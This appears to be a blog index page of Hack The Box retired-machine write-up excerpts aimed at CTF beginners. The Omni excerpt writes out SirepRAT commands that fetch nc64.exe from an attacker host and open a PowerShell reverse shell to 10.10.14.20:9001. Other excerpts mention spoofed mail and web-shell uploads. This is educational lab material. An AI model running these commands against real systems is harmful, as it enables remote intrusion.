Hackthebox retired machine are those machines which are not active on the Hackthebox . But the good thing about the retired machines is that the writeups for hackthebox retired machines are available . So the beginners who are starting the CTF journey can read these writeups and get the idea how the machines are solved .
This machine involves scanning of ports which then leads to ipmi hashes leak. Then followed by subdomain enumeration and logging into zabbix account .Then getting reverse shell through command execution through zabbix
Introduction Steps Involved Port Scan python3 SirepRAT.py 10.10.10.204 LaunchCommandWithOutput –return_output –cmd “C:\Windows\System32\cmd.exe” –args “/c powershell Invoke-Webrequest -OutFile C:\nc64.exe -Uri http://10.10.14.20:8000/nc64.exe” –v python3 SirepRAT.py 10.10.10.204 LaunchCommandWithOutput –return_output –cmd “C:\Windows\System32\cmd.exe” –args “/c C:\nc64.exe 10.10.14.20 9001 -e powershell.exe” –v
It is a great machine from hackthebox .It is Having BSD OS .which is very vulnerable .Starting with authentication bypass which gave the ssh-keys for a user .Then simple exploiting OPenBSD 6.6 vulnerabilities .
Academy is a great linux machine from the hackthebox platform.It is an easy machine which involves tampering of roleid to register as the admin and then get the dev subdomain.Which is followed by exploiting the app.
It was a great machine from hackthebox.It had only two ports open.And after testing the website got an error and got a CVE related to it .Rest was easy .For privilege escalation linpeas was enough.
Introduction Column Details Name Sneakymailer IP 10.10.10.197 Points 30 Os Linux Difficulty Medium Creator Sulcud Out On 11 July 2020 Steps involved 1-Port Scan 2-Basic website enumeration 3-Sending Spoofed mail 4-Login into imap using paulbyrd creds and extracting mails 5-Login into ftp using developer creds 6-Uploading a Reverse shell through ftp 7-Subdomain enumeration 8-Getting shell … Read more
Steps Involved 1-Port Scan 2-Enumerating Website 3-Exploiting Gym Management Software 1.0 4-Getting Web-shell 5-Getting full shell and user.txt 6-Privilege Escalation 7-Exploiting Cloudme.exe 8-Getting root flag Port Scan ┌─[[email protected]]─[~/Desktop/hackthebox/buff] └──╼ $cat nmap Nmap 7.80 scan initiated Fri Aug 7 23:10:59 2020 as: nmap -Pn -sC -sV -v -oN nmap 10.10.10.198 Nmap scan report for 10.10.10.198 Host … Read more
Use the NTLM hash d948**************************f to unlock the content.Hackthebox sauna writeup
